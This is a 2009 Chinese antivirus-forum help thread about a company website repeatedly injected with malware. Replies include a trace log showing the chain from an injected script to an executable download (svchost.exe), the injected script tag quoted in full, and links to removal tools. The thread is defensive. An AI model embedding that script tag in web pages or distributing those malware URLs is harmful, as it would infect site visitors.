瑞星卡卡安全论坛技术交流区恶意网站交流 求助:我们公司网站老是被挂马,怎么办呀!

12   1  /  2  页   跳转

求助:我们公司网站老是被挂马,怎么办呀!

收藏
本主题由 在线技术支持工程师 瑞星工程师14 于 2009-8-2 10:53:19 执行 移动主题 操作
冰淇淋小子
头像
特邀体验者
  • 帖子:10294
  • 注册: 2004-07-10
  • 来自:江苏南京
10温馨圣诞
发表于: 2009-07-31 23:14 | 只看楼主 短消息 资料
字号: 1楼

求助:我们公司网站老是被挂马,怎么办呀!

因为挂马了,所以无法提供地址给你们,怎么办呀!

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAXTHON 2.0)

喜欢一个人很容易,但是要遇到一个你可以爱一辈子的人是很不容易的事,找到了就千万不要轻易的放弃。
分享到:
gototop
 
冰淇淋小子
头像
特邀体验者
  • 帖子:10294
  • 注册: 2004-07-10
  • 来自:江苏南京
10温馨圣诞
发表于: 2009-07-31 23:15 | 只看楼主 短消息 资料
字号: 2楼

回复:求助:我们公司网站老是被挂马,怎么办呀!

http://www.ydyyw.com/default.aspx
最后编辑networkedition 最后编辑于 2009-08-03 09:10:48

喜欢一个人很容易,但是要遇到一个你可以爱一辈子的人是很不容易的事,找到了就千万不要轻易的放弃。
gototop
 
ty88
头像
卡卡反病毒小组
  • 帖子:979
  • 注册: 2007-07-12
  • 来自:
论坛8周年活动礼物论坛9周年纪念瑞星金牌用户
发表于: 2009-07-31 23:30 | 短消息 资料
字号: 3楼

回复:求助:我们公司网站老是被挂马,怎么办呀!

关于:hxxp://www.ydyyw.com/default.aspx解密的日志(全体输出 -  31):

Level  0>http://www.ydyyw.com/default.aspx
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/200942415649236.jpg&tw=70&th=70
Level  1>http://qvoev323.cn/c.js
Level  2>http://5u66j.cn/aa/a3a.htm
Level  3>http://s6.cnzz.com/stat.php?id=1408284&web_id=1408284
Level  3>http://img.tongji.linezing.com/1137761/tongji.gif
Level  3>http://js.tongji.linezing.com/1137761/tongji.js
Level  3>http://5u66j.cn/aa/360.htm
Level  4>http://5u66j.cn/aa/pp.htm
Level  4>http://5u66j.cn/aa/02.htm
Level  5>http://5u66j.cn/aa/s1
Level  5>http://5u66j.cn/aa/02.js
Level  6>http://chulaiba.net/svchost.exe
Level  4>http://5u66j.cn/aa/test.htm
Level  4>http://5u66j.cn/aa/he.htm
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/200942415142970.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424143731782.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/20094241431211.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424142527814.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424141042532.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424134652189.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/20094241258301.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/2009423164225829.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/200942316231329.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/2009423155913298.gif&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/2009423155523423.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/ht
Level  1>http://www.ydyyw.com/http
Level  1>http://www.ydyyw.com/js/jquery-1.2.6.pack.js
Level  1>http://www.ydyyw.com/scripts/scroll_door_hover.js

日志由 Redoce2.0第19次修正版于 2009-7-31 23:28:49 生成。

这个毒看到都要吐了。。。。
清除方法是有的就是比较麻烦
gototop
 
superlover
头像
禁止发言
  • 帖子:14
  • 注册: 2008-03-28
  • 来自:
发表于: 2009-07-31 23:30 | 短消息 资料
字号: 4楼

回复: 求助:我们公司网站老是被挂马,怎么办呀!

该用户帖子内容已被屏蔽
gototop
 
ty88
头像
卡卡反病毒小组
  • 帖子:979
  • 注册: 2007-07-12
  • 来自:
论坛8周年活动礼物论坛9周年纪念瑞星金牌用户
发表于: 2009-07-31 23:33 | 短消息 资料
字号: 5楼

回复: 求助:我们公司网站老是被挂马,怎么办呀!



引用:
原帖由 superlover 于 2009-7-31 23:30:00 发表
请加QQ ,专业提供网站/服务器安全检测、安全维护等服务,可以完全防御除DDOS以外的任何攻击。

不要做广告
修复方法一会上传
gototop
 
ty88
头像
卡卡反病毒小组
  • 帖子:979
  • 注册: 2007-07-12
  • 来自:
论坛8周年活动礼物论坛9周年纪念瑞星金牌用户
发表于: 2009-07-31 23:42 | 短消息 资料
字号: 6楼

回复: 求助:我们公司网站老是被挂马,怎么办呀!

这样填写即可

引用:
<script src=http://qvoev323.cn/c.js></script>
如图
程序已上传

附件附件:

下载次数:397
文件类型:application/octet-stream
文件大小:
上传时间:2009-7-31 23:41:44
描述:rar
gototop
 
太行定一方风云
头像
禁止访问
  • 帖子:181
  • 注册: 2009-07-19
  • 来自:Tehon
发表于: 2009-07-31 23:48 | 短消息 资料
字号: 7楼

回复:求助:我们公司网站老是被挂马,怎么办呀!

该用户帖子内容已被屏蔽
致力于社会主义思想体系创建与信息产业国产或开源利用化……
gototop
 
ty88
头像
卡卡反病毒小组
  • 帖子:979
  • 注册: 2007-07-12
  • 来自:
论坛8周年活动礼物论坛9周年纪念瑞星金牌用户
发表于: 2009-07-31 23:52 | 短消息 资料
字号: 8楼

回复: 求助:我们公司网站老是被挂马,怎么办呀!

如果以上方法无法清除
请尝试
http://www.520hack.com/Soft/Soft5/200904/14289.html
http://www.zzx8.com/html/s14305.html
http://www.newjian.com/Anti-virus/anti_virus_2028.html
这些工具
如果依然不行欢迎联系我
或者找瑞星的网址区版主孔子
不过好像孔子要收费
gototop
 
安全初级工程师
头像
禁止发言
  • 帖子:898
  • 注册: 2007-09-08
  • 来自:Canada
论坛8周年活动礼物
发表于: 2009-08-01 08:44 | 短消息 资料
字号: 9楼

回复:求助:我们公司网站老是被挂马,怎么办呀!

该用户帖子内容已被屏蔽
gototop
 
冰淇淋小子
头像
特邀体验者
  • 帖子:10294
  • 注册: 2004-07-10
  • 来自:江苏南京
10温馨圣诞
发表于: 2009-08-01 09:09 | 只看楼主 短消息 资料
字号: 10楼

回复:求助:我们公司网站老是被挂马,怎么办呀!

我知道了,谢谢!

喜欢一个人很容易,但是要遇到一个你可以爱一辈子的人是很不容易的事,找到了就千万不要轻易的放弃。
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT